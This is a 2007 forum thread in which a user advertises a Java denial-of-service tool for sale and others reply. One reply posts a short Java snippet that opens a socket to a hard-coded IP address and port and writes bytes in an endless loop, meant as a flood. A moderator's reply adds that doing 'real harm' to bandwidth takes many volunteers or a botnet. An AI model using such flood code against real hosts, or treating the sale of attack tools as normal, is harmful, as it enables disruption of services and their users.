Selling a Java DoSer with a form.

Discussion in 'Programming General' started by Inching Away, Aug 19, 2007.

Selling a Java DoSer with a form.
  1. Unread #1 - Aug 19, 2007 at 12:46 PM
  2. Inching Away
    Joined:
    Aug 3, 2007
    Posts:
    249
    Referrals:
    1
    Sythe Gold:
    0

    Inching Away Active Member

    Selling a Java DoSer with a form.

    Selling a Java DoSer in RSGP. I can use an MM but a official one at that. It has an input form to make it easy to use. Add me on MSN to discuss it. [email protected]

    It starts a Connection using WinSock Controls than continuously writes Bytes to the stream, having the same effect as pinging for ever with a spoofed IP.
     
  3. Unread #2 - Aug 19, 2007 at 1:12 PM
  4. speljohan
    Joined:
    Apr 24, 2005
    Posts:
    1,450
    Referrals:
    3
    Sythe Gold:
    0

    speljohan Guru
    Visual Basic Programmers

    Selling a Java DoSer with a form.

    Code:
    Socket s = new Socket("65.3.71.83", 5352);
    DataOutputStream dos = new DataOutputStream(s.getOutputStream());
    while(true) {
    dos.writeBytes("zomghax");
    }
    There you go ;)

    And no, you aren't using WinSock, and you aren't using "Controls". That's not java.
     
  5. Unread #3 - Aug 20, 2007 at 5:19 AM
  6. Swan
    Joined:
    Jan 23, 2007
    Posts:
    4,957
    Referrals:
    0
    Sythe Gold:
    0
    Sythe's 10th Anniversary Member of the Month Winner

    Swan When They Cry...
    Retired Global Moderator

    Selling a Java DoSer with a form.

    single client DDoSers are pointless anyway. You either need to have a lot of volunteers or a botnet if you wanna do any real harm to their bandwidth lol.
     
  7. Unread #4 - Aug 20, 2007 at 4:19 PM
  8. Olan14
    Joined:
    Jan 26, 2007
    Posts:
    581
    Referrals:
    0
    Sythe Gold:
    0

    Olan14 Forum Addict

    Selling a Java DoSer with a form.

    You Fucker!! Inching I Fucking Hate You. Selling Something I Made! I'm The One Who Described It Like That! Omfgg
     
< What file does Runescape rely on to... | need help plase any one? ill vouch you big time! >

Users viewing this thread
1 guest


 
 
Adblock breaks this site